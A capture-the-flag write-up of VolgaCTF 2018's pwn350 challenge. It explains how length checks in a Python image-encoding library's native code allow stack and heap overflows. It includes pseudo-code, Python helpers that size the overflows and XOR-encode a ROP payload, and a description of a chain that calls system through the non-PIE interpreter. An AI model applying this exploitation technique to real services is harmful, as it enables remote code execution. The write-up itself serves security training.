hxp | VolgaCTF Quals 2018: pwn350 "XOR Trick" writeup

Sun, 25 March 2018 ~ aengelke


The challenge consisted of a Python service which encodes a user-supplied message in a user-supplied image using a native Python extension library. Because the library's length checks were wrong, it allowed buffer overflows on the stack as well as on the heap.

Python service

The service runner (service.py) is a forking server, which performs the following operations for each connection:

Print out the exact Python version (3.5.2 (default, Nov 23 2017, 16:37:01) \n[GCC 5.4.0 20160609])
Read an image and a message
Parse the image to an array of RGB data
Hand image data and message over to the native library, which returns new image data
Encode the new data in a PNG and send it to the client

Native library

The native library (xtproc.so), compiled for x86-64, provides a single function process, which takes a three-dimensional numpy array for the image data and the message as a bytes object as parameters. The function first transforms the image data into a contiguous form and allocates a new output array of the same size, which is returned in the end.

At this point, the function xor_trick is called, which performs the actual transformation. The function takes six arguments and is apparently written in assembly by hand. In pseudo-code:

long xor_trick(long width, long height, const char* inbuf, char* outbuf, size_t msglen, const char* msg)
    mangler = "\x2A\x84\x10\x42\x1E\x5C\x14\xC5\x2A\x84\x10\x42\x1E\x5C\x14\xC5"
    buf = alloca(width * height * 3) // size aligned to 16
    for i = 0; i < msglen; i += 16
        buf[i:i+16] = msg[i:i+16] ^ mangler

    for i = 0; i < msglen; i++
        for bit = 0; bit < 8; bit += 2
            r13b:r14b:r15b = inbuf[0:3]
            inbuf += 3

            byte = buf[i] >> bit
            hi = (byte >> 1) & 1
            lo = byte & 1

            if (r13b ^ r14b ^ lo)
                r13b ^= 1
            else if (r14b ^ r15b ^ hi)
                r15b ^= 1

            outbuf[0:3] = r13b:r14b:r15b
            outbuf += 3
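
To make the inner loop easier to follow, here is a minimal Python model of it. This is a sketch of the pseudo-code above, not a disassembly: the names embed_pair and embed_byte are ours, and we assume that only the least significant bit of each XOR result is tested.

```python
def embed_pair(c0, c1, c2, lo, hi):
    """Model one inner-loop iteration: three channel bytes in, three out."""
    # Assumption: the conditions only look at the lowest bit of the XOR.
    if (c0 ^ c1 ^ lo) & 1:
        c0 ^= 1  # corresponds to r13b ^= 1
    elif (c1 ^ c2 ^ hi) & 1:
        c2 ^= 1  # corresponds to r15b ^= 1
    return c0, c1, c2


def embed_byte(pixels, value):
    """Spread one (already mangled) byte over four pixels, two bits each."""
    out = []
    for k, bit in enumerate(range(0, 8, 2)):
        shifted = value >> bit
        lo = shifted & 1
        hi = (shifted >> 1) & 1
        out.append(embed_pair(*pixels[k], lo, hi))
    return out
```

Note that every message byte consumes four pixels, i.e. 12 bytes of input and 12 bytes of output, regardless of how many pixels the image actually has.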

We can observe two buffer overflows in this code:

The size of the buffer allocated on the stack depends on the size of the image data, but not on the length of the message: a small image with a large message immediately yields control of rip.
The amount of data written to the output buffer also depends on the message length and not on the size of the image, yielding a heap buffer overflow. In addition, an image with large dimensions combined with a short message leads to an information leak, as the output buffer then contains uninitialized data.
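
The arithmetic behind both overflows can be sketched as follows. The helper names are ours, and we assume one byte per color channel, so both the image and the output array hold width * height * 3 bytes.

```python
def align16(n):
    """Round n up to the next multiple of 16."""
    return (n + 15) & ~15


def overflow_sizes(width, height, msglen):
    """Estimate how many bytes are written past each buffer."""
    image_bytes = width * height * 3   # assumed size of inbuf and outbuf
    stack_buf = align16(image_bytes)   # alloca size, aligned to 16
    stack_written = align16(msglen)    # the XOR loop copies 16-byte blocks
    heap_written = msglen * 4 * 3      # 4 pixels per byte, 3 bytes per pixel
    return {
        "stack_overflow": max(0, stack_written - stack_buf),
        "heap_overflow": max(0, heap_written - image_bytes),
    }
```

For a 1x1 image and a 0x100-byte message, overflow_sizes(1, 1, 0x100) reports 240 bytes past the stack buffer and 3069 bytes past the output array.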

This implies that we can easily control rip by supplying an image of dimensions 1x1 and a large enough message (the first 0x48 bytes are ignored or end up in registers). However, note that we always overflow the stack buffer and the heap buffer at the same time.
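
Since the message is XORed with the mangler before it lands on the stack, the payload has to be XORed with the same key beforehand. A minimal sketch, assuming the 0x48-byte offset mentioned above; the function names and the filler byte are our choice, and the chain contents are left to the caller:

```python
# 16-byte key from the pseudo-code: an 8-byte pattern repeated twice.
MANGLER = bytes.fromhex("2a8410421e5c14c5") * 2


def mangle(data):
    """XOR data with the repeating key; applying it twice is the identity."""
    return bytes(b ^ MANGLER[i % 16] for i, b in enumerate(data))


def build_message(chain, pad_len=0x48):
    """Return the message whose mangled form is filler followed by chain."""
    desired = b"A" * pad_len + chain
    return mangle(desired)
```

The library then undoes the XOR while copying, so the bytes of chain appear unmodified at offset 0x48 of the stack buffer.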

Finding suitable targets

But where to go from here? Even though the server is forking, implying that addresses are the same across connections, we don’t know the address of libc or of any other library. And although we are able to leak some pointers, they are not helpful, since we don’t know what they point to.

At this point, we tried to find the binary of the Python interpreter itself, since the service prints such detailed version information. It turned out that the Python3 of an updated Ubuntu 16.04.3 gives exactly the same version identifier and, to our surprise, it wasn’t a position-independent executable but was linked at a fixed address.

Our first attempt was to jump to the interpreter loop, first using Py_Main(0, NULL) and then using PyRun_InteractiveLoop(stdin, ""). Unfortunately, stdio was not bound to our socket, which we circumvented by calling dup2(4, 0) and dup2(4, 1) at the beginning of our ROP chain. But alas! For some (unknown) reason, reading from the socket always failed with EAGAIN. Writing to the socket was still possible, though. Then, we tried to run PyRun_SimpleString with a string supplied in our message. But again, this didn’t work: we had to smash the heap to get this far (see above), and the interpreter calls malloc and free several times, causing the program to abort at some point.

Since reading from the socket was impossible, running /bin/sh via execve wouldn’t help us either. Fortunately, since the interpreter is a big binary, tons of gadgets are available, allowing us to place a shell command on the stack and call system with this value.

Full exploit

See here.

Flag: VolgaCTF{M@ke_pyth0n_explo1table_ag@in}